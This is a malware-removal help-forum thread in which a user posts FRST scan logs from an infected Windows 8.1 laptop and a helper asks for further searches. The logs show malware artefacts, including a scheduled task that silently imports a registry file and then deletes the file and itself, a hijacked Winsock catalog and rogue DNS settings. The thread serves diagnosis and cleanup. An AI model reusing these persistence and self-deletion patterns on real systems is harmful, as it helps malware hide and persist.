Task: {A4561249-F93C-42DD-9156-9C763476AE13} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-21] ()
Task: {A477CF67-A8F7-4DE2-B002-921BDC79B211} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
Task: {A56409DE-600B-4BC0-9A96-DF01E8D4AA28} - System32\Tasks\psv_Tripplezap => /c regedit.exe /s "C:\ProgramData\Medlight\Kay-Ity.reg" & del "C:\ProgramData\Medlight\Kay-Ity.reg" & SCHTASKS /Delete /TN "psv_Tripplezap" /F <==== ATTENTION
Task: {A6208F98-D826-4652-BF83-E7D44CA2A837} - \DNSARCHBOLD -> No File <==== ATTENTION
Task: {AAEA193D-3DD3-4D12-B57E-AD3C71C7F783} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd)
Task: {AF2DA830-E9A5-4C18-9C70-0913A510B21C} - \One System CarePeriod -> No File <==== ATTENTION
Task: {AFB865ED-9145-4839-81CC-EB2D84F61DFB} - System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412 => C:\Program Files\IIS\iis.exe [2016-01-09] (Microsoft)
Task: {B3552ACF-EA18-40A2-9D83-B3EBA7173A0C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {B62A1854-5E8B-4971-A249-401D4464FF54} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {BBCA6AF3-1387-4A66-837F-B9936560FBB0} - System32\Tasks\Olunnuag => C:\ProgramData\Olunnuag\1.0.7.1\evmihlus.exe
Task: {BD4E8E43-4441-4A4B-8137-BE0060B0F289} - System32\Tasks\EgisUpdate => C:\Program Files\EgisTec IPS\EgisUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {C0596212-D5EE-44AF-AAAB-07C61EDA0EC5} - \Taplika nise -> No File <==== ATTENTION
Task: {C80AA8E6-C6C0-4160-B234-B2589888E728} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-28] (Adobe Systems Incorporated)
Task: {CFC03435-6807-4B22-8F28-92616C6160D2} - System32\Tasks\DriverNavigator Scheduled Scan => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
Task: {D0395F3B-097A-47A4-A07D-D3977F7D3FD0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {D1BE1EA4-7412-4A4B-9468-76D0C35F4DE6} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
Task: {D1D5F7D9-DFF0-4F73-BE19-8BA1E5BA3000} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P => C:\WINDOWS\system32\WindowsPowerShell\taskprocess.exe [2016-01-09] (gltstech.net)
Task: {DBE9B34A-58C0-4CC7-B79B-D7498B9DD164} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe
Task: {DC75A548-011F-44B6-AE74-CDA52157237D} - System32\Tasks\WebDnsio2 => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
Task: {E06DA7D4-9D01-4CBE-80C7-A4BFD6357661} - System32\Tasks\Goose => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll [2016-01-09] (Birds365)
Task: {F975168C-909D-4C2D-8BC0-CFD9AC8553A4} - System32\Tasks\UXJOVQQVBISGUWLJ => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DriverNavigator Scheduled Scan.job => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Goose.job => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job => powershell exe
Task: C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job => powershell exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)
 
On top of a very heavy infection, we also have one system file infected, so I need to see if we have any healthy replacement.

Re-run FRST again.
Type the following in the edit box after "Search:".

dnsapi.dll

Click the Search files button and post the log (Search.txt) it makes in your reply.
 
You missed a part of the Addition.txt log just below this:

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)
so I'll need that too.
 
Sorry about the overlap - seems you gave me additional instructions but I didn't get them till after I posted the first log. I'll restart again with your additional instructions. Thx :)
 
So I looked at the Additional text log and there's nothing after it but I'll recopy if you'd like - just advise. Also, I reran it as per your instructions and have the search text log copied first (below) then the next will be the FRST log.

Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
Ran by owner (2016-01-10 19:22:38)
Running from E:\
Boot Mode: Safe Mode (minimal)

================== Search Files: "dnsapi.dll" =============

C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll
[2015-01-23 12:05][2014-11-04 17:20] 0498688 ____N (Microsoft Corporation) 205BDB00F4C032AF45A6BFD18EA7886C [File is digitally signed]

C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll
[2014-11-21 01:16][2015-03-30 20:19] 0000202 ____A () D06D08FC499336D17F6E9F6E05847576 [File not signed]

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll
[2015-01-23 12:05][2014-11-04 17:44] 0657920 ____N (Microsoft Corporation) 0B082D6D7A53D91678E7409DD145E89C [File is digitally signed]

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll
[2014-11-21 01:15][2015-03-29 13:33] 0000206 ____A () 056816A63C5C311231348A5F56F0A496 [File not signed]

C:\Windows\SysWOW64\dnsapi.dll
[2015-01-23 12:05][2015-01-23 12:05] 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59 [File not signed]

C:\Windows\System32\dnsapi.dll
[2015-01-23 12:05][2015-01-23 12:05] 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12 [File not signed]

====== End of Search ======
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
Ran by owner (administrator) on ACER (10-01-2016 19:30:04)
Running from E:\
Loaded Profiles: owner (Available Profiles: owner)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-10] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
HKLM\...\Run: [Sound+] => "C:\Program Files\Sound+\Sound+.exe"
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [LManager] => [X]
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKLM-x32\...\Run: [oasi_en_323010107] => [X]
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
AppInit_DLLs: C:\ProgramData\Medlight\Icenix.dll => No File
AppInit_DLLs-x32: C:\ProgramData\Medlight\Topstrong.dll => No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\Kefzha.dll [289144 2016-01-09] ()
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\Kefzha64.dll [768376 2016-01-09] ()
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKLM -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
SearchScopes: HKU\S-1-5-21-3773202632-424774445-890114178-1001 -> DefaultScope {87CE1942-94DA-4865-9277-D2ADDAA931E6} URL =
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome:
=======
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AmazingTab; C:\Program Files\amztab\amztab.exe [383488 2016-01-09] () [File not signed]
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe [28160 2016-01-09] () [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
